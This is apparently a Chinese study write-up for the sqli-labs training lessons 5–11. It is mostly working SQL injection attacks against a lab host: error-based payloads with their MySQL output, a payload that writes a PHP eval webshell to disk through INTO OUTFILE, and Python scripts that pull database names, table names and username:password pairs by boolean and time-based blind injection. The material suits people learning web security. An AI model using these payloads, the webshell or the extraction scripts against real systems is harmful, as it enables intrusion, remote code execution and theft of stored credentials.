5&6 子查询注入

有mysql的错误显示
本质是floor(rand)函数与group组合情况下的报错
参考文章:https://www.cnblogs.com/BloodZero/p/4660971.html

payload1:查询库名
mysql> SELECT * FROM users WHERE id='0'union select 1,count(*),concat_ws(':',(select database()),floor(rand()*2)) as a from information_schema.tables group by a;
ERROR 1062 (23000): Duplicate entry 'security:1' for key 'group_key'
payload2：查询表名
mysql> SELECT * FROM users WHERE id='0'union select 1,count(*),concat_ws(':',(select table_name from information_schema.tables),floor(rand()*2)) as a from information_schema.tables where table_schema='security' group by a;
ERROR 1242 (21000): Subquery returns more than 1 row
这里提示说结果子查询超出一行，确认问题是处在这里

payload3:用limit一个一个查询表名
mysql> SELECT * FROM users WHERE id='0'union select 1,count(*),concat_ws(':',(select table_name from information_schema.tables where table_schema='security' limit 3,1),floor(rand()*2)) as a from information_schema.tables where table_schema='security' group by a;
ERROR 1062 (23000): Duplicate entry 'users:1' for key 'group_key'
payload4：查询列名
mysql> SELECT * FROM users WHERE id='0'union select 1,count(*),concat_ws(':',(select column_name from information_schema.columns where table_name='users' limit 1,1),floor(rand()*2)) as a from information_schema.tables where table_schema='security' group by a;
ERROR 1062 (23000): Duplicate entry 'username:1' for key 'group_key'
payload：查询内容
mysql> SELECT * FROM users WHERE id='0'union select 1,count(*),concat_ws(':',(select concat(username) from users limit 0,1),floor(rand()*2)) as a from information_schema.tables where table_schema='security' group by a;
ERROR 1062 (23000): Duplicate entry 'Dumb:0' for key 'group_key'

6与5差别在单引号和双引号
payload:http://sql.test/Less-6/?id=1%22union%20select%20null,count(*),concat_ws(%27:%27,(select%20username%20from%20users%20limit%200,1),floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a--+

7 利用文件写入一句话木马

首先吐槽一下这里的闭合方式，试了半天没办法看代码才知道，两个括号。。。

这一题需要用sql语句来进行文件操作。
需要用到函数select 'xxx' into outfile 'xxx';
用到这个的时候需要文件的绝对地址，而我们只能凭借经验来猜测。
根据系统和数据库猜测，如winserver的iis默认路径是c:/inetpub/wwwroot/，这好像说偏了，这是asp的，但知道也好
linux的nginx一般是/usr/local/nginx/html，/home/wwwroot/default，/usr/share/nginx，/var/www/htm等
apache 就/var/www/htm，/var/www/html/htdocs
payload:http://sql.test/Less-7/?id=0%27))union%20select%20null,null,%27%3C?php%20@eval($_POST[a]);?%3E%27into%20outfile%20%22D:/sqli-labs-master/test.php%22--+

8 布尔盲注

就是相比第五题关闭了报错显示
分析一下语句:SELECT * FROM users WHERE id='1'and ((select database())='secrity')-- ' LIMIT 0,1
无报错,根据是否返回you are in...来判断sql执行结果
那么找到可以执行的语句

mysql> SELECT * FROM users WHERE id='1'and (ascii(mid((database()),1,1))>200);
Empty set (0.00 sec)

mysql> SELECT * FROM users WHERE id='1'and (ascii(mid((database()),1,1))>2);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | Dumb     | Dumb     |
+----+----------+----------+
1 row in set (0.00 sec)

附上脚本

import requests
from tqdm import tqdm
import time

def bp(name,payload):
    for j in tqdm(range(1, 200)):
        min = 33
        max = 127
        while abs(min - max) > 1:  # s
            mid = int((min + max) * 0.5)
            payloadd = payload.format(str(j), str(mid))
            rsp = requests.get(url=url + payloadd)
            rsp.encoding = 'utf-8'
            if ("You are in..." in rsp.text):
                min = mid
            else:
                max = mid
            # print(str(min)+"-"+str(max))
        name += chr(max)
        print(name)
        if(name[-1:]==name[-2:-1]):
            break
    return name
url="http://sql.test/Less-8/"
databasename=""
tablename=""

t1=time.time()
payload1 = '?id=1%27and%20(ascii(mid(database(),{},1))>{})%23'
databasename=bp(databasename,payload1)
payload2 ="?id=1%27and%20(ascii(mid((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema='"+databasename+"'),{},1))>{})%23"
tablename=bp(tablename,payload2)
t2=time.time()
print("总共时长为:")
print(t2-t1)
print(databasename+"\n"+tablename)


#下面是第二个脚本
import requests
from tqdm import tqdm

def bp(name,payload):
    for j in tqdm(range(1, 200)):
        min = 33
        max = 127
        while abs(min - max) > 1:  # s
            mid = int((min + max) * 0.5)
            payloadd = payload.format(str(j), str(mid))
            rsp = requests.get(url=url + payloadd)
            rsp.encoding = 'utf-8'
            if ("You are in..." in rsp.text):
                min = mid
            else:
                max = mid
            # print(str(min)+"-"+str(max))
        name += chr(max)
        print(name)
        if(name[-1:]==name[-2:-1]):
            break
    return name

url="http://sql.test/Less-8/"
usernamepassword=""
payload3 ="?id=1%27and%20(ascii(mid((select%20group_concat(username,':',password%20separator%20'<br>')%20from%20users),{},1))>{})%23"
usernamepassword=bp(usernamepassword,payload3)
print(usernamepassword)

9 时间盲注

看一下源码,不论sql查询语句的结果是否为空都返回you are in...

想办法构造一下payload,测试成功：?id=0%27or%20if((ascii(mid((database()),{},1))>{}),sleep(0.3),0)--+

import requests
from tqdm import tqdm
import time

def bp(name,payload):
    for j in tqdm(range(1, 200)):
        min = 33
        max = 127
        while abs(min - max) > 1:  # s
            mid = int((min + max) * 0.5)
            payloadd = payload.format(str(j), str(mid))
            # print()
            t1=time.time()
            rsp = requests.get(url=url + payloadd)
            rsp.encoding = 'utf-8'
            t2=time.time()
            if (t2-t1>5):
                min = mid
            else:
                max = mid
            # print(str(min)+"-"+str(max))
        name += chr(max)
        print(name)
        if(name[-1:]==name[-2:-1]):
            break
    return name
databasename =''
tablename    =''
url="http://sql.test/Less-9/"
# payload1 = '?id=0%27or%20if((ascii(mid((database()),{},1))>{}),sleep(0.3),0)--+'
# databasename=bp(databasename,payload1)
databasename='security'
payload2 ="?id=0%27or%20if((ascii(mid((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema='"+databasename+"'),{},1))>{}),sleep(0.3),0)--+"
tablename=bp(tablename,payload2)
#下面是求字段的脚本
#这里的payload写了好久，太长了容易看错，需要仔细一点
import requests
import time
from tqdm import tqdm

def bp(name,payload):
    for j in tqdm(range(1, 200)):
        min = 33
        max = 127
        while abs(min - max) > 1:  # s
            mid = int((min + max) * 0.5)
            payloadd = payload.format(str(j), str(mid))
            t1 = time.time()
            rsp = requests.get(url=url + payloadd)
            rsp.encoding = 'utf-8'
            t2 = time.time()
            if (t2 - t1 > 5):
                min = mid
            else:
                max = mid
            # print(str(min)+"-"+str(max))
        name += chr(max)
        print(name)
        if(name[-1:]==name[-2:-1]):
            break
    return name

url="http://sql.test/Less-9/"
usernamepassword=""
# payload3 ="?id=0%27or%20if(ascii(mid((select% group_concat(username,':',password separator '<br>') from users),{},1))>{}),sleep(0.3),0)%23"
# payload3 ="?id=0%27or%20if((ascii(mid((select group_concat(username,':',password separator '<br>') from users),{},1)>{}),sleep(0.3),0)%23"
payload3 ="?id=0%27or%20if((ascii(mid((select group_concat(username,':',password separator '<br>')from users),{},1))>{}),sleep(0.3),0)--+"
usernamepassword=bp(usernamepassword,payload3)
print(usernamepassword)

10

相比于第九题将单引号改成了双引号

import requests
from tqdm import tqdm
import time

def bp(name,payload):
    for j in tqdm(range(1, 200)):
        min = 33
        max = 127
        while abs(min - max) > 1:  # s
            mid = int((min + max) * 0.5)
            payloadd = payload.format(str(j), str(mid))
            # print()
            t1=time.time()
            rsp = requests.get(url=url + payloadd)
            rsp.encoding = 'utf-8'
            t2=time.time()
            if (t2-t1>5):
                min = mid
            else:
                max = mid
            # print(str(min)+"-"+str(max))
        name += chr(max)
        print(name)
        if(name[-1:]==name[-2:-1]):
            break
    return name
databasename =''
tablename    =''
url="http://sql.test/Less-10/"
payload1 ='?id=0"or if((ascii(mid((database()),{},1))>{}),sleep(0.3),0)--+'
databasename=bp(databasename,payload1)
databasename='security'
payload2 ='?id=0"or%20if((ascii(mid((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema='"+databasename+"'),{},1))>{}),sleep(0.3),0)--+'
tablename=bp(tablename,payload2)
#下面是求字段的脚本
# import requests
# import time
# from tqdm import tqdm
#
# def bp(name,payload):
#     for j in tqdm(range(1, 200)):
#         min = 33
#         max = 127
#         while abs(min - max) > 1:  # s
#             mid = int((min + max) * 0.5)
#             payloadd = payload.format(str(j), str(mid))
#             t1 = time.time()
#             rsp = requests.get(url=url + payloadd)
#             rsp.encoding = 'utf-8'
#             t2 = time.time()
#             if (t2 - t1 > 5):
#                 min = mid
#             else:
#                 max = mid
#             # print(str(min)+"-"+str(max))
#         name += chr(max)
#         print(name)
#         if(name[-1:]==name[-2:-1]):
#             break
#     return name
#
# url="http://sql.test/Less-9/"
# usernamepassword=""
# # payload3 ="?id=0%27or%20if(ascii(mid((select% group_concat(username,':',password separator '<br>') from users),{},1))>{}),sleep(0.3),0)%23"
# # payload3 ="?id=0%27or%20if((ascii(mid((select group_concat(username,':',password separator '<br>') from users),{},1)>{}),sleep(0.3),0)%23"
# payload3 ='?id=0"or%20if((ascii(mid((select group_concat(username,':',password separator '<br>')from users),{},1))>{}),sleep(0.3),0)--+'
# usernamepassword=bp(usernamepassword,payload3)
# print(usernamepassword)

11 报错注入

非标准解法